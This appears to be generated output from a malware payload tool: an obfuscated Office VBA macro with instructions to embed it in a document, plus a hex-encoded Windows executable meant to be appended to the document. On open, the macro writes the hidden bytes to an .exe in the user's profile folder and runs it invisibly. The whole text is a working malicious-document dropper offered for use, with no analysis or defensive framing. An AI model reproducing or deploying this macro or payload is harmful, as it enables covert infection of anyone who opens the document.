'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
	Pcpbk12
End Sub

Sub Pcpbk12()
	Dim Pcpbk7 As Integer
	Dim Pcpbk1 As String
	Dim Pcpbk2 As String
	Dim Pcpbk3 As Integer
	Dim Pcpbk4 As Paragraph
	Dim Pcpbk8 As Integer
	Dim Pcpbk9 As Boolean
	Dim Pcpbk5 As Integer
	Dim Pcpbk11 As String
	Dim Pcpbk6 As Byte
	Dim Fxkgjhalou as String
	Fxkgjhalou = "Fxkgjhalou"
	Pcpbk1 = "hUaosUcgdAVV.exe"
	Pcpbk2 = Environ("USERPROFILE")
	ChDrive (Pcpbk2)
	ChDir (Pcpbk2)
	Pcpbk3 = FreeFile()
	Open Pcpbk1 For Binary As Pcpbk3
	For Each Pcpbk4 in ActiveDocument.Paragraphs
		DoEvents
			Pcpbk11 = Pcpbk4.Range.Text
		If (Pcpbk9 = True) Then
			Pcpbk8 = 1
			While (Pcpbk8 < Len(Pcpbk11))
				Pcpbk6 = Mid(Pcpbk11,Pcpbk8,4)
				Put #Pcpbk3, , Pcpbk6
				Pcpbk8 = Pcpbk8 + 4
			Wend
		ElseIf (InStr(1,Pcpbk11,Fxkgjhalou) > 0 And Len(Pcpbk11) > 0) Then
			Pcpbk9 = True
		End If
	Next
	Close #Pcpbk3
	Pcpbk13(Pcpbk1)
End Sub

Sub Pcpbk13(Pcpbk10 As String)
	Dim Pcpbk7 As Integer
	Dim Pcpbk2 As String
	Pcpbk2 = Environ("USERPROFILE")
	ChDrive (Pcpbk2)
	ChDir (Pcpbk2)
	Pcpbk7 = Shell(Pcpbk10, vbHide)
End Sub

Sub AutoOpen()
	Auto_Open
End Sub

Sub Workbook_Open()
	Auto_Open
End Sub

'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************

Fxkgjhalou
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&HFA&HF2&HA8&H5B&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HBA&HAA&HF2&H9B&HE0&HD9&HCA&HD9&H74&H24&HF4&H58&H33&HC9&H66&HB9&H04&H02&H31&H50&H15&H83&HE8&HFC&H03&H50&HBB&H10&H6E&HD1&H7B&HBC&H99&H02&H3B&H3D&HFE&HDD&H8B&H59&H77&H01&H50&H86&H1F&HA1&HCB&H12&HD8&HFF&H67&H81&H13&HA7&HB4&H00&H6A&HF2&H8B&HCA&H9E&H00&HB3&HF9&H23&HEE&H98&H84&H35&H7E&HD5&H8D&HE3&HEA&HE2&H06&HFF&H53&H76&H56&H90&H15&HB0&H07&H94&HC0&HD6&HC3&HC3&HFB&H5F&HAD&H75&H1A&H1D&H3C&HBB&H08&H7B&H00&HD6&H4A&HE5&HA0&HB8&H00&HEB&H5D&H10&H3F&H0C&H1E&H8A&H23&H70&H33&HF2&H80&H73&H28&HA6&H88&H2E&H16&H1C&H8F&H02&HE6&HB3&H2C&H86&H93&H48&H98&HB2&HA5&H0C&H50&H4F&H88&H6C&HEF&HC2&HA8&HE9&H2C&HE5&HA9&HC1&H99&H20&H20&H16&H9D&H4E&HA7&H57&H5E&HE9&HE3&HAB&HF2&HD3&H97&H84&H41&H46&H1E&HA0&HA9&H1D&H93&H07&H64&H3D&H79&HF9&HDD&HEF&HC9&HDA&H74&H0B&H0A&H32&H41&H50&H68&H60&H94&HD6&H9C&H30&H74&HF1&H6B&H18&H58&HFE&H40&H18&H6A&H2A&H25&H77&HD8&H79&H3D&H4F&HE8&H8C&HE3&HAB&HB0&HEB&H02&H48&H29&H2B&HB2&HC5&H55&H5D&H8B&HE7&HD1&H5E&H2B&H53&H37&H77&HC8&HEF&HA1&H57&HD4&H96&HF5&H62&H7A&H8D&H82&HD6&H7F&H05&H2F&HBA&HD5&HA1&H5B&H71&HFA&H87&HCE&HD2&HBF&HD6&H48&H05&HF6&HA4&HD4&H07&H29&H45&H61&HB4&HBD&HF5&H9D&H5F&HFD&H75&HFD&HC8&HDB&HCE&HAA&H05&HB5&H1C&H63&H77&HAA&HF1&H43&HD0&HF8&H5A&HBF&H69&HA7&H25&H80&H13&HF4&H4B&H84&HDA&HEB&H6D&H0A&HA6&H79&H94&H1B&H4F&H49&HF6&HE6&H8E&H6A&HA7&H45&HC8&H2D&H07&HE4&HE1&HD9&H4D&HCA&H0F&HA8&HCF&HA5&HEE&H45&H62&HA2&H8C&HF6&HF0&H0A&H3D&H0A&HFF&H4B&H55&HB3&H23&HF7&H6E&HBA&H83&H03&H63&H82&HE6&HD7&H84&H9D&HB2&H8D&H3C&HF6&HC7&HF9&H4E&HD4&H11&HDB&H76&H76&H9D&HA7&H1D&H64&HD1&H11&H72&HB2&HF0&H66&H8E&H31&H85&H05&HA2&HD8&HFE&HC2&H25&H18&H22&H64&H71&HF1&H72&H26&H22&HBC&HEB&H63&H3D&H10&H0B&H96&HCC&HF9&H7C&H14&H41&HD6&HFB&HB1&H94&H86&H33&H58&H36&HE4&H68&H79&H7F&H42&H77&H16&H21&HFE&H96&H1E&H0C&HFB&HED&H13&HD0&H9B&HED&HFC&HF4&H8A&H82&HDC&HA6&HE4&H10&HBF&HB3&HD7&H50&H6F&H68&H94&H43&HB1&H1B&HB7&H61&H39&H29&H8C&H37&H82&HD8&H17&HEF&HD0&H13&H10&H54&HB5&H07&HF0&HA6&H62&H4C&HB2&H6A&H4D&H34&H0B&H38&H9D&H34&HBD&H5B&H44&HB1&H7E&HBC&H6F&H70&H7E&H58&HDF&H9D&H09&HC0&H7E&H54&H36&HF1&H89&HD7&HFC&HB3&HD7&HD5&HFE&H3E&H04&H4A&HC6&HB9&HCF&HFD&HF9&H86&H42&HED&H65&H81&H8D&H24&H2B&H88&H24&HCF&H77&HC5&HF9&H1D&H26&HD9&HC2&H0F&H1D&H91&HB7&H20&HE8&HF6&H37&H05&HCF&H01&H05&H0D&HEA&H9F&HD5&HFB&H42&HCD&H06&H97&H66&HDA&H19&H81&H7A&H72&HB0&H40&HF2&H0E&H3A&H09&H1C&H23&H58&H1F&H84&H57&H28&HBD&HA9&H1B&H1C&H08&H42&H7A&HBD&H90&H7F&HC3&H9B&HFF&H5F&H30&H3B&H0F&H3C&HBF&HA3&HF1&HF4&H9B&H57&H80&H14&H13&H0C&HC3&H11&HDE&H6A&H51&HE1&HCE&H52&H2B&H1A&H75&HB1&HED&HED&H4C&H0C&H26&HCA&HE1&HC2&H5F&H99&HBB&HCF&HA0&HAB&H3E&H81&H27&H53&HE0&H62&H01&HF0&HAD&HCF&H1D&H61&HE0&HAE&H66&HE8&HEB&HC5&HE3&HF9&HF7&HBA&HE0&HFF&HDC&H9B&H6D&H46&HC8&H4E&HFA&HFF&H32&H54&HC2&H74&HB1&HC6&HFA&H98&H62&H42&H7A&HE5&H5E&HF9&H7A&H66&HE3&H54&H7A&HAA&H27&H51&H12&H36&HCF&H0C&H6F&H5D&HC4&H8C&H71&HE5&H1B&H13&H7A&HE6&H23&HFE&H73&H36&HB0&HBB&HE4&H14&HB2&H71&HA7&HBA&H41&HCD&H56&H52&H89&H17&H5E&H0D&HE6&HFC&H96&H9C&H81&H3E&H2D&H4D&HF2&HE9&H45&HA3&H92&H0E&H18&H5F&HE3&H47&H96&H10&H47&H28&H92&H73&H45&HD8&H06&HCF&HE3&HF8&HDF&H36&H0F&H8C&H0E&H44&H14&H0F&HFB&H2D&H4F&H3C&H1E&H57&H97&H3C&HB4&HFF&H29&H5E&H10&HA6&H8D&H59&H59&H0C&H5B&HE3&H93&H64&H16&H9D&H3F&HFC&H56&H8B&H37&H2A&HCE&H7C&H1B&HD4&HD7&H40&HD1&HDE&HA1&HDF&HDE&H83&H6A&HC9&H55&HDB&H1B&H43&HAD&H79&H88&HBB&HA7&H72&H30&H5D&H95&H38&H18&H71&H86&HFE&HAE&H2E&H6D&H7C&H5E&HC2&HDE&HCA&HBC&H35&H13&HC2&HD1&H22&H84&HBA&H9E&H7E&H41&H1A&H1F&H5B&H52&H99&H67&H95&H89&H4D&HF6&H42&H50&HDC&H67&H76&HD1&HA3&H35&H0B&HBE&H30&H64&HC1&H75&H55&HC0&H90&HC8&H86&H0C&HCB&H06&HE0&H49&HEE&H9C&H12&H6C&H0D&HC0&HCE&H90&H03&HAD&H15&H3C&H79&H98&H2A&H5C&H66&H07&HC9&H96&H98&H65&H65&H1F&HF1&H60&HE0&H68&H4E&H4F&HA4&H0F&HBF&H4A&HB4&H98&HCC&H0B&H50&H96&HD1&HFF&H0F&H0A&HC0&HBE&H98&H11&H09&H7E&H67&H6B&HA8&H8C&H33&HD7&H08&HAD&H8C&HDB&H06&H29&HA2&HAC&H6A&H60&H03&H90&H09&H83&H27&H44&HE4&H92&H17&H86&HAB&H6F&HD6&H46&H3B&HC7&H3A&H98&H1E&H60&H89&HD8&H81&H8A&H8C&H1F&HFD&H40&HCA&HAA&H6E&HEB&H4A&H0B&H06&H92&H23&H4B&H4B&H11&HA8&H2F&H01&H0C&HFA&H20&H3A&HC1&H07&HBF
&HD9&H43&H78&H71&H34&H56&HE1&H24&HCA&H3C&H20&HEF&HC0&HEE&H0C&H4C&HF7&H49&HED&HDB&HCB&HED&H8F&HB7&H3E&H5C&H7F&HCB&H7D&H49&HAB&H63&HDC&HF2&HCF&H00&H2C&H6C&HBC&HCE&HC6&HB1&H83&H81&HCF&H08&HAD&H5B&H39&H51&H54&HF5&H70&HBB&H6D&H59&HAB&H33&H98&H6F&H5F&H8D&HD3&H18&HA9&H4B&HD2&HDC&H80&HF5&HFC&H4B&H89&HA9&H1C&H1A&H82&HEB&HAE&H74&H98&H38&HB6&HA9&HF8&H53&H51&HCF&H2C&H8C&HD5&H90&H2C&HB0&H9A&H47&H86&HC9&H29&H9F&H3C&H3D&HB9&H24&H88&H29&HE1&H6A&H67&H5A&HE2&HCC&H29&HE6&H82&HA9&H34&H5B&H1C&H70&H8E&HD1&HCB&H25&HF6&H52&HFB&H21&H02&HD8&H43&H58&H16&H25&H85&HF4&HE5&H73&H55&H44&H7F&HC0&H4F&HEB&HAF&H7F&HF4&H33&H5D&HE7&H57&H57&H22&H68&HA8&H7F&HDE&HCB&H73&HB8&H97&H67&H8A&H07&H0B&H3C&H6D&H7C&H75&H10&HD5&HC2&H14&H6A&H2B&H49&HE1&HA7&H3E&H11&HCF&H03&H09&HB1&HDB&H3C&H5B&H93&H78&HDF&HC6&HCF&H2D&H6A&HE5&H0D&H5C&H6C&H34&H9A&HBD&HD9&H42&H5B&H50&HD3&HCD&HF1&H76&H17&HF1&H43&H53&H64&H60&H47&H0B&H95&H4E&H39&H2E&H76&HAF&HDD&HD6&H1E&HF9&H4A&H85&H38&H19&H01&H6A&H3D&H41&H28&H3D&H0D&HAC&H84&H32&H41&H25&H25&HE8&HC9&HB1&H96&H30&H62&H11&H81&H7C&HED&H46&H9B&H43&HA5&H5A&H25&HB6&H8E&HBB&HB2&HFE&HD6&H67&H1F&H87&H67&H0B&HA9&H6D&H2E&H35&H89&HA3&HE4&H4F&H81&H0D&H8D&HCB&H8F&H4C&HCE&H0A&HA7&H8E&H90&HC9&HFC&H15&H35&H18&H0B&HAB&H61&H46&HF4&HA8&H40&H3E&H0B&H82&H7A&HF3&H85&H5B&H26&H1F&H54&HB0&HF0&H3C&H2B&H20&HC8&HDD&HCE&HED&H20&H5A&H6D&H05&H17&HA6&H0F&H19&H3C&HCE&H2B&H20&HA6&H6A&H0B&H06&H8D&H60&H3A&H63&H33&HF5&H50&H30&H58&HE7&H79&H14&HB6&HE8&H61&HA2&H4D&H38&HA7&H20&HEC&H82&H11&H70&H93&HA4&HD2&H3C&H8C&H2F&HF9&H76&H2C&HD9&HE4&H21&H11&HDC&H99&H0E&H9C&HED&HEA&H98&H08&HCC&H73&H58&H7B&H53&H62&H58&H7D&H5E&H09&HDD&H78&H7A&H94&HAF&H2D&H83&HFE&HB9&H9B&H6F&H2D&HED&H99&H59&H5F&HED&HB9&HDB&HDC&H52&HDB&HC7&H49&H15&HBB&HB8&H33&H84&H9E&HA1&HB6&HBB&HC2&H40&HAA&H79&H40&H9E&HE2&H09&H0F&H8E&H22&HAD&H37&HC7&H79&HF6&HC2&H81&H96&H95&HED&HB2&HA9&H50&H3D&H8F&H0E&H6A&H1A&H24&H0A&H08&H53&HC4&HA3&HA4&H74&H30&HAC&H0A&H23&H95&H5B&HD7&H21&H62&HF9&HB1&H77&HB6&HBE&H83&HBB&H0F&H85&H06&H3F&H8B&HFB&H2A&H06&HC9&H4D&H6B&HBD&H21&HA4&HD7&HE0&H48&H1B&H39&H50&HF1&HBF&H79&H50&H72&H89&H31&H18&HF4&HAD&HA0&H08&H24&HDD&H6F&H14&H80&HE1&HB3&H61&HE5&H07&H17&HA8&H12&HF3&H18&H5B&H28&H78&HE0&HDF&HD6&H52&H35&H3A&HC7&HC8&H24&H25&H57&H38&H48&H22&HC1&H50&H75&H34&HF8&HB9&H8C&H6A&H52&H7C&H49&H2F&H7F&HA0&H1A&H8E&HEB&HC9&H63&H0C&H27&H97&HC8&HE8&H20&H90&HF2&H51&H0C&HF7&HF1&H94&HA3&H75&H81&HBD&H54&H4B&HEB&H8D&H80&H0B&H8B&H8B&H2E&HC9&H65&HAE&H15&HCB&H46&H7F&H47&H7F&H32&HA8&HED&H91&HCA&HDD&H3D&H62&H63&H3D&H5B&H3D&H47&H06&H13&H0A&H6A&H76&H97&HFF&HD5&H99&H57&H1E&HD1&H20&HDB&HCF&H2B&H5A&H6B&H14&HDB&H2F&H25&H97&H6E&H72&H50&HB8&H7D&H4B&HD8&HDA&HB4&HF5&H35&H46&H3D&H8D&HFE&H44&H87&H9C&H65&HC7&H54&HB2&H8E&HD6&HA2&HB4&H28&H23&H12&H55&HAC&H3C&H77&H16&H23&H17&HD4&HFB&H03&HD0&H1D&H90&HBD&HEE&HE0&H6B&H2B&HE3&H27&H63&H4D&H33&H49&HF7&H27&HA6&HEC&H62&H12&HE3&H33&H99&H04&HB3&H54&HBE&H8E&HD1&H41&H2B&H1A&H3B&H70&H4F&HEF&H1A&HE0&HC8&H9D&H23&H58&H2B&H11&HB0&H1F&H6D&H8C&H28&H95&H86&H9C&HCE&H5A&H18&HC0&H0C&H31&H3B&HDB&H8A&HDB&HBE&HA6&HFC&HD1&HA8&H67&HB5&HF8&H29&HEA&H65&H00&H33&HB5&HC3&H08&H3F&HB0&H12&H00&HC9&HB3&H4A&HCE&H83&HF5&H9A&H1C&HA0&HCC&HD2&H73&H8A&H17&H32&H94&H01&H57&HF2&H2D&H31&H73&H0E&H8A&H03&H0A&H8A&H27&H42&H0C&HD9&H35&H8B&H37&H56&HF7&HD0&H0E&H5D&HBF&H35&H6A&HD6&H72&HB8&HF2&H4A&H47&H79&H7D&HFC&H19&H11&H68&HDF&H73&HBA&H2E&HDA&H89&H7E&H3C&H56&H67&H75&H7E&H6A&H8B&HDD&HB1&H33&H87&HA4&H3F&H61&H45&HF4&H97&H25&HD4&H82&HFE&HDB&H9F&H50&H9F&H0B&H54&H8F&H06&H77&HBB&H60&H96&H90&HC0&H76&H24&H8B&H97&H07&H30&H08&HE3&H81&H84&H05&H46&H6E&HE7&H68&HD1&HCE&H60&H44&HF9&H7F&HC3&H3F&H53&H5C&HD5&H2A&HB7&HFC&H27&HF2&H39&H58&H18&H40&H78&HF4&H6C&H74&H9F&H93&H03&H4A&H5E&H22&H18&HDB&HE0&HE0&H23&H2B&HDE&HDD&HE5&H02&HA4&H26&HE9&HA2&H6A&H70&H31&HBA&HFB&H17&H2C&HBE&HDB&HF8&H9B&HF3&H9C&H79&H08&HB7&HB6&H31&H57&H4A&HB2&H62&H3A&HC1&HA7&H31&HC0&HAE&H3B&H67&H3E&H65&H61&H1E&H5F&H8C&HC5&HC9&H40&HD3&HD6&H24&HF6&H29&H6D&HA6&H92&HA0&H7D&HC2&H98&H30&H34&HFE&HBC&HE6&HFF&HAF&H23&H63&H7B&HD9&HA9&HEA&H27&HE4&HA7&H1D&H86&HAE&H01&H8C&H5B&H0E&H88&HD4&H38&H27&HBF&HA7&HDB&H7D&H3B&HD8&HFA&H66&H53&H6C&H54&HED&H2F&H59&H7D&HD5&H61&HEF&HAE&HBC&HDD&H39&HEF&H1A&H5F&HFB&H21&H63&HDE&H7C&HDD&H04&HEF&H30&H9E&H57&H49&H21&H4B&HDD&HD1&H8B&H68&HF4&HA4&HE4&H19&H51&HCF&HD8&HCF&H2F&HE3&HCF&HB0&H38&H02&H8F&HD1&H10&H99&H5E&H95&H64&HE1&HDE&HE5&H16&H9E&H92&H2F&HDA&H39&HC0&H01&H61&HED&H54&H3B&HC8&HDD&H97&H25&HAE&H34&HEF&HE4&H4A&HFF&H65&HF6&H16&H83&H64&H5C&HC7&H7D&H2E&HE1&H04&H59&H96&H50&HBE&H0E&HE8&H01&H68&HEE&HF1&H02&H37&HF0&H59&HD2&H6C&HAC&H48&HD2&HDC&H5E&HA3&H24&H7A&H20&H90&H42&H37&H5F&H4D&H2A&HAC&H64&HAD&H09&HC9&HB6&H80&H4C&H28&H4A&HD9&H91&HC2&H0A&H8B&HB1&HD7&H20&H7E&H36&H7B&H11&H40&HCB&HA5&H01&HB6&H32&H99&H22&H94&HF6&HC1&HC3&H46&HB0&HAB&HFC&H15&H06&H49&H63&HF4&HEE&HE1&HB3&HB2&H9B&H10&H91&H00&H80&HE5&HDA&H02&H5E&H59&H62&H6C&H9A&H4F&HA0&H03&HD9&HF7&H5E&H32&HAF&HA3&H99&HB3&H13&HE3&HFB&HD7&HCB&HC6&H87&H21&H66&HAB&HD3&H1D&H18&HEF&H7A&H08&H38&HE1&HA1&HDD&HCD&HD8&HBE&H08&HA3&H46&H69&HDF&H7C&H10&H44&H88&H62&HF8&HA8&HFE&H6E&HFE&H60&H4C&HF5&H15&H4F&H05&H50&HDD&HCC&H7D&H36&H3B&HBD&H35&H2D&HED&H61&H26&H18&HFA&H32&H5C&H86&HD9&HD1&H32&H35&H33&HD4&H13&H0E&HBF&HAA&H12&HF9&H1C&H13&H69&HCE&H48&HAA&H89&H9B&H1A&HB3&HF0&H1C&H7D&HE0&HE5&H26&H8E&HD0&HF2&H5A&H6D&H6F&H67&HF8&HB0&H51&H13&HB2&H88&H55&H82&H21&HFC&H24&HCA&H98&HB6&HA1&H25&H0B&HC3&HDB&H89&H05&H4C&HA0&H53&HD8&H4A&H14&H18&HC8&H93&HAB&HCD&HA3&H3C&HBF&H40&HEF&H94&H7E&H59&H2A&HA8&H95&HEB&HFF&HEE&H42&H79&H27&H44&H24&HE5&H3D&HB7&H9A&H9A&H2F&H1B&HB6&H8C&HAB&H18&H34&H5D&HD9&HB3&H34&HA8&HB2&HB2&H71&HEF&H88&H44&H23&HE2&H71&HCD&H67&H41&HEF&H8E&HDC&HAD&HDB&H17&HA7&HCB&H85&H58&HAD&HA1&H63&H2C&HD4&HD8&HEC&H49&H60&H9B&H17&H50&HEC&HEF&H92&HB3&H5D&H16&H11&H73&HE3&H15&HA1&H66&HB9&H02&H30&HEA&HE1&HCF&H3E&H96&HB9&HDA&H65&HA2&H9B&HEF&HDD&HDC&H98&H9A&HD8&H1B&HA6&HEE&HE8&HFB&H8B&H90&H0A&H9F&H6B&H66&H76&H2A&H12&HE2&H38&H91&H6C&HC3&H9A&H68&HF8&H1F&H0B&H66&H25&H2D&H2D&HCA&H3B&HA6&HB7&H70&HCB&HC1&H02&H9A&HBF&H6D&H40&HF4&H98&H13&H2D&H3C&H64&H6E&HC9&H19&HB4&H4F&H8D&H1C&HB2&H65&H7E&H28&H70&HE7&H50&H33&HCD&H5B&H33&H68&H38&H5D&HD3&HF2&HE9&HA8&H12&HC5&H66&HA8&H7D&HF5&H59&H76&H09&H0C&HA6&HDA&HE8&H82&H2E&H17&H63&HC3&H15&H19&H9F&HCC&H62&HCC&HA5&H67&H53&H9E&HB1&H08&HF5&H2F&H2C&H43&H3E&H7A&H63&H7D&HBD&H61&H50&H80&H0A&HEF&H5E&H0D&HC4&H00&H8E&H01&HE9&HB2&H18&H00&HB7&H33&HDC&H5B&H36&H0C&HBC&HD2&H3A&HFC&HDD&HFE&H46&H2C&H1E&H0D&HF2&HAB&H15&HEC&H1D&H5D&HA9&H9C&H2C&H8C&H05&H4D&HC4&H47&HF9&HF0&HA7&HBA&H38&H99&H01&H1F&H36&HED&H84&H0F&HFF&H05&HAE&HB3&H38&HEA&HB5&HF6&H33&H40&HDF&H6C&H23&HD5&H2B&H71&H4D&HC4&H46&HEF&HA8&H69&H61&H15&HE8&HCC&HBC&HAA&H17&H48&H50&H79&H97&H30&HBC&H3A&H52&HBC&HF6&HA8&HAA&HB6&H15&H69&HBE&HA3&HFC&HCE&HAD&H1A&HAD&H9B&H6B&HCA&HEF&HFB&HD6&H61&H54&HCB&H6D&HB3&H91&H82&HBB&HC9&H83&H9D&H00&H2C&HD2&HA3&H53&H93&HD8&H6E&H86&H44&HC5&HAA&HCA&H2E&H2B&HCF&H88&H8E&H01&H6C&HD1&H09&H6E&HB3&H6D&H55&HED&HAC&H45&H42&HD8&HA2&HAC&HA0&H60&H74&H9E&H10&H1C&HA4&H21&H99&HC9&HA3&H6C&HD4&H8F&HE5&H1E&HF0&HB9&H81&HF0&HB5&HBC&HD2&H64&HBB&HA1&HE5&H07&HD8&H41&H7F&H7E&HA1&HC2&H79&H18&H26&HB8&HEE&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
